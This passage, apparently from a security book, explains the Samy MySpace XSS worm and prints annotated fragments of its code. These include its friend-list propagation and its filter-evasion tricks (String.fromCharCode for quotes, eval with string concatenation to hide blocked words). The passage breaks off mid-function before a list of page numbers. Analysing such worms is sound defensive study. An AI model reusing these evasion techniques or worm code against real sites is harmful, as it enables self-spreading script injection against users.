addFriendsProcess to add user
11851658 (Samy) to the victimized friend list. This completes the core functionality of
the SAMY worm.
Samy??™s Supporting Variables and Functions
Some of the functions shown in the preceding code call other functions within the worm.
For completeness, we present the rest of the worm code. This code contains some interesting
62
tricks to circumvent MySpace??™s security controls such as using String.fromCharCode()
and obfuscating blocked strings with string concatenation and the eval() function.
// Samy needed double quotes and single quotes, but was not able to place
// them in the code. So he grabs the characters through
// String.fromCharCode().
var doubleQuote = String.fromCharCode(34); // 34 == "
var singleQuote = String.fromCharCode(39); // 39 == '
// Create a TextRange object in order to grab the HTML body of the page that
// this function is running on. This is equivalent to
// document.body.innerHTML.
// Interestingly, createTextRange() is IE specific and since the script
// injection is IE specific, he could have shorten this code drastically to
// simply "var getHtmlBody = document.body.createTextRange().htmlText;"
function getHtmlBody() {
var htmlBody;
try {
var textRange = document.
Pages:
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151